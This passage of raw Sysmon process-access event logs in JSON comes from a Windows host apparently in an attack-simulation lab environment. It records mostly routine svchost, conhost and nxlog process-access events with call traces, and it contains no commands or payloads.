C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6086,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6087,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6088,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6089,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6090,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6091,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6092,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.511\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-00106B8A0600}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.511","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-00106B8A0600}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6093,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.526\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 